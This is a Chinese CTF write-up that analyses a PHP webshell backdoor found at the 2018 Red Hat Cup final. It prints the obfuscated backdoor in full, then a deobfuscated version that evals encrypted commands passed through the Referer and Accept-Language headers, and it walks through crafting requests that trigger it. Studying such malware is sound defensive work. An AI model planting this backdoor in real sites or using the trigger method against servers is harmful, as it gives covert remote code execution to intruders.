開始前的例行叨叨：

這個後門樣本收集於2018紅帽杯線下決賽，看到有其他分析收集於自己的伺服器，悲劇了（手動笑哭），貌似藍帽杯也有。

除錯了很久，被逼著專門學了半天正則表示式，但感覺寫完這篇文章就忘乾淨了。

馬的特殊性就是，靠特別麻煩，讓你在現場心態崩潰，除錯不出來，而且抓到流量不會打，直接打過去也看不懂結果6666

（手動滑稽）

後門原始碼

<?php
$s='=0;pw($pwj<$c&&$ipw<$l);$jpw++pw,$i++){$opw.=$pwt{$i}^$k{$j}pw;}}repwpwturn pw$o;}$r=$_SERVEpwR;[email protected]
 
$r["HpwTTP_REpwpwFE';
$I='m[2]pw[$z]];ipwf(strpopwspw($p,$h)pw===0){$s[$pwpwi]="";$pwppw=$ss($p,3);}if(apwrray_pwkey_existpws($i,$pws)){pw$s[$i].pw=$p;';
$U='$epw=strppwpwos($s[$ipw],$f);ipwfpw($e){pw$k=$pwkpwh.$kf;ob_start();@evpwapwl(@gzuncpwpwompress(@x(@baspwepw64_decpwpwode(';
$d=str_replace('pF','','cpFreapFtepFpF_pFfuncpFtion');
$Q='preg_replapwce(arrapwypwpw("/_/","/-/"),array("pw/"pw,"+"),pwpw$ss($s[pw$i],0pw,$e))),$k)));pw$opw=ob_gepwt_pwcopwpwntents();o';
$O='b_end_clean(pw);$d=bpwase64pw_epwncode(x(gzcompwpress($opw),$pwk));pripwntpw("<$kpw>$d</$k>");@sespwpwspwion_destroy();}}}}';
$y='RERpwpw"];
 
[email protected]$r["HTTP_ACCEPTpwpw_LANGUAGE"];pwifpw(pw$rr&&$ra)pw{$u=parsepw_urlpw($rr);parspwe_str($upw["qpwupwery"],$q);';
$X='$q=pwapwrray_values(pwpw$q);preg_mpwatchpw_alpwl("/([\\w])[pw\\wpw-]+(?:;q=0.(pw[pw\\d]))?,?/pw",$rpwpwa,$m);pwif($q&&$m){@';
$b='sespwsion_stapwrt();$pwspw=&$_SESpwSpwION;$pwss="spwubpwstr";$sl="pwstrtolopwwer";$i=$m[1][0]pwpw.$m[1][1];pw$h=$sl(pwpw$s';
$q='pws(md5($i.$kh)pw,0,3));$fpwpw=$pwsl($ss(md5($i.$kfpw),0pwpw,3));$p="pw";fopwr($zpw=1;$z<count($m[1pwpw]);$pwz++)$p.=$pwq[$';
$W='$kh="d6a6";pw$kf=pw"bc0d";pwfupwnction x($pwt,$pwkpw){$c=spwtrlen($k);$l=pwpwstrlen($t);pwpw$o="pw";for($i=0pw;$i<$l;){fopwr($j';
$j=str_replace('pw','',$W.$s.$y.$X.$b.$q.$I.$U.$Q.$O);
$u=$d('',$j);$u();
?>
 

經過Debug除錯，解混淆

解混淆後的原始碼

<?php
$kh = "d6a6";
$kf = "bc0d";
function x($t, $k)
{
    $c = strlen($k);
    $l = strlen($t);
    $o = "";
    for ($i = 0; $i < $l; ) {
        for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {
            $o .= $t{$i} ^ $k{$j};
        }
    }
    return $o;
}
$r  = $_SERVER;
$rr = @$r["HTTP_REFERER"];
$ra = @$r["HTTP_ACCEPT_LANGUAGE"];
if ($rr && $ra) {
    $u = parse_url($rr);
    parse_str($u["query"], $q);
    $q = array_values($q);
    preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/", $ra, $m);
    if ($q && $m) {
        @session_start();
        $s =& $_SESSION;
        $ss = "substr";
        $sl = "strtolower";
        $i  = $m[1][0] . $m[1][1];
        $h  = $sl($ss(md5($i . $kh), 0, 3));
        $f  = $sl($ss(md5($i . $kf), 0, 3));
        $p  = "";
        for ($z = 1; $z < count($m[1]); $z++)
            $p .= $q[$m[2][$z]];
        if (strpos($p, $h) === 0) {
            $s[$i] = "";
            $p     = $ss($p, 3);
        }
        if (array_key_exists($i, $s)) {
            $s[$i] .= $p;
            $e = strpos($s[$i], $f);
            if ($e) {
                $k = $kh . $kf;
                ob_start();
                @eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/","/-/"), array("/","+"), $ss($s[$i], 0, $e))), $k)));
                $o = ob_get_contents();
                ob_end_clean();
                $d = base64_encode(x(gzcompress($o), $k));
                print("<$k>$d</$k>");
                @session_destroy();
            }
        }
    }
}
?>

開始調戲試原始碼

emmmmm這個後門凶的很。。。先一步一步分析，在賽場上第一次看到，直接調到自己崩潰。

1、找到傳入引數方式

$r = $_SERVER;$rr = @$r["HTTP_REFERER"];$ra = @$r["HTTP_ACCEPT_LANGUAGE"];if ($rr && $ra) {

這段在自己定義的x函式之後，也就是最開始要執行的程式碼了。

看到

r變數是$_SERVER陣列的內容

rr是http頭中Referer:欄位內容

ra是Accept-Language:欄位內容

用burp抓包Repeter傳送+vscode除錯

發現有了Referer和Accept-Language後，可以進入if條件。

2、u變數和q變數的含義

if條件中接下來的程式碼是

$u = parse_url($rr); parse_str($u["query"], $q); $q = array_values($q);

對傳入的Referer進行了parse_url函式，這個函式可以轉化url為陣列。

若url為

http://www.111.com/index.php?aa=11&bb=22&cc=33

經過轉化u的值為：

parse_str函式是把傳入的aa=11&bb=22&cc=33做轉化，轉化成陣列存入$q變數

array_value是把key<=>value型陣列，轉化成只有值的陣列，僅取11 22 33

3、正則表示式的玄機

比賽的時候，斷網，看到這就心態炸了。。。

preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/", $ra, $m);

這個函式是從$ra中正則匹配所有滿足條件的值給$m

底下的if判斷就要判斷$m是否為空，所以我們必須知道操作$m的方法。

$ra是Accept_Language的內容，所以對它進行匹配，修改傳入引數就好了。

先放個結果 當傳入accept為：

abb-c;q=0.2,ABB-C;q=0.3,dee-f;q=0.4

看到$m結果有3個數組，第一個陣列是切分了三段，第二個陣列是每段的起始a、A、d，第三段是數字q=0.x

我們分析這個正則語句

去掉首尾的//剩下：

([\w])[\w-]+(?:;q=0.([\d]))?,?

([\w])

[]是字符集的意思，匹配一個字元

[abc]意思是找字串中是否存在abc這三個字母

\w元字元表示：字母數字下劃線

它加了括號表示，這部分匹配到的內容，單獨存放一個數組，也就是$m[1]

([\w])匹配到的內容是開頭的字母，如a A d都是每一個符合整式內容的結果開頭字母

[\w-]+

這個沒有括號，字符集中\w表示匹配一個字母數字或下劃線，-號表示 -號也作為被識別的範圍

但後面跟了加號，表示可以出現一次或者多次，也就是

傳入ab-cde中，a會被([\w])匹配，b-cde都被[\w-]+匹配

(?:;q=0.([\d]))?

注意這個結構可以簡化為(?:xxxxx)?

最後一個？意思是括號中的內容可以出現一次或多次

括號最開始出現(?:

表示括號中的內容，不單獨記錄為一個數組！

之前([\w])被記入$m[1]，而這個括號內的內容不記入$m[2]

;q=0.([\d])

括號內這部分表示識別;q=0.

([\d])

\d元字元表示匹配所有數字，括號表示單獨記錄數字到陣列$m[2]

所以現在應該可以理解了$m陣列的所有內容。

4、md5部分

if ($q && $m) { @session_start(); $s =& $_SESSION; $ss = "substr"; $sl = "strtolower"; $i = $m[1][0] . $m[1][1]; $h = $sl($ss(md5($i . $kh), 0, 3)); $f = $sl($ss(md5($i . $kf), 0, 3));

正則匹配後$m有了內容就可以進入if條件

開啟了session

$ss和$sl是函式名，在後邊會動態使用

$i是abb-c;q=0.2,ABB-C;q=0.3,dee-f;q=0.4中

前兩段的開頭a和A拼接起來的

$i=aA

$h是把aA + bc0d後進行md5再用ss動態函式取前3位，再用sl動態函式轉為小寫

$f同理

5、$p值

$p = ""; for ($z = 1; $z < count($m[1]); $z++) $p .= $q[$m[2][$z]]; if (strpos($p, $h) === 0) { $s[$i] = ""; $p = $ss($p, 3); }

傳入3段值時，$m[1]大小為3，$z的值為1和2

$m[2]值為q=0.x傳入的數字，取傳入的第二第三個數字

所以傳入q=0.0 q=0.0 q=0.1 由於$z=1所以第一個值無效

讓$p.=$q的0和1項

所以傳入Accept-Language: abb-c;q=0.0,ABB-C;q=0.0,dee-f;q=0.1

這樣$p會等於index.php?aa=11&bb=22&cc=33中的1122

下邊需要$p的開頭是$h

$h是md5值的前3項"aa4"

所以傳入?aa=aa4就可以往下走了

此時$p是aa422，經過$ss動態substr函式後，$p被截掉前3位aa4只剩下22

6、執行前的最後一波

if (array_key_exists($i, $s)) { $s[$i] .= $p; $e = strpos($s[$i], $f); if ($e) { $k = $kh . $kf; ob_start();

要檢測$s

$s是陣列"aA"=""

$i是"aA"

對$s陣列的"aA"鍵賦值$p

"aA"="22"

$e = strpos($s[$i], $f);

要在22中找$f值，$f也是提前md5的前3位值，這裡f是"2d4"

由於後邊執行的程式碼是$ss($s[$i], 0, $e)

對"aA"的內容去掉"2d4"

若"aA"="abc2d4"

要執行的程式碼就是abc

所以我們傳入index.php?aa=aa4&bb=1112d4

111部分就是要執行的程式碼部分

7、執行函式拆解

@eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/","/-/"), array("/","+"), $ss($s[$i], 0, $e))), $k)));

先看最裡層$ss($s[$i], 0, $e)

把傳入的1112d4去掉2d4得到111

preg_replace(array("/_/","/-/"), array("/","+"), "111")

這個正則替換，要把111中的

 _ 替換為 / 

 - 替換為 +

也就是111應該是個base64但是是把base64的/換為了_  把+換為了-的base64

再對替換後進行base64解碼

解碼後執行x函式

x(解碼值,$k)

其中$k是$k = $kh . $kf;

是提前預設好的2個4位值加起來 d6a6bc0d

x(解碼值,"b6a6bc0d")

gzuncompress(x的返回值)

這是zlib解壓縮字串函式，壓縮函式是gzcompress

對x的返回值進行解壓縮

解壓後再執行

x函式

function x($t, $k){ $c = strlen($k); $l = strlen($t); $o = ""; for ($i = 0; $i < $l; ) { for ($j = 0; ($j < $c && $i < $l); $j++, $i++) { $o .= $t{$i} ^ $k{$j}; } } return $o;}

對傳入的值逐位和$k中的祕鑰"b6a6bc0d"進行異或

異或完的值，需要是一個被gzcompress壓縮過的值，因為要對結果進行解壓

這個被壓縮過的值不能直接顯示，所以需要base64，base64記得是替換過/+的base64

分析下異或，如果傳入0123456789

01234567分別和b6a6bc0d異或

89再和b6異或

沒有長度限制，沒有長度限制。。。

一開始的時候看錯了$j < $c && $i < $l 條件

迴圈完內輪後，i還沒到最後，只是祕鑰到了最後

重新會進入內輪，只是j=0讓祕鑰從頭開始

8、返回資訊

ob_start(); @eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/","/-/"), array("/","+"), $ss($s[$i], 0, $e))), $k))); $o = ob_get_contents(); ob_end_clean(); $d = base64_encode(x(gzcompress($o), $k)); print("<$k>$d</$k>");

注意ob_start是開啟快取

再進行eval

也就是eval期間，所有的輸出值，都存在快取中不直接輸出給瀏覽器

全部執行完後，$o得到的快取內容

進行了gz壓縮，還進行了x函式異或加密，再base64編碼後，返回給瀏覽器。

所以拿到返回結果，要逆著解出來真的輸出值。

放個結果的例子，執行phpinfo();後的返回

最後，這個馬真的很6，想互動式利用，寫個python吧，但需要根據自己傳入的引數修改

現場是幾乎不可能除錯完，再寫互動式shell了，只有提前準備。

馬的安全性來說，最好加個md5驗證，但如此複雜，是為了把人煩死。。。抓到流量也不會打，結果還是加密的6666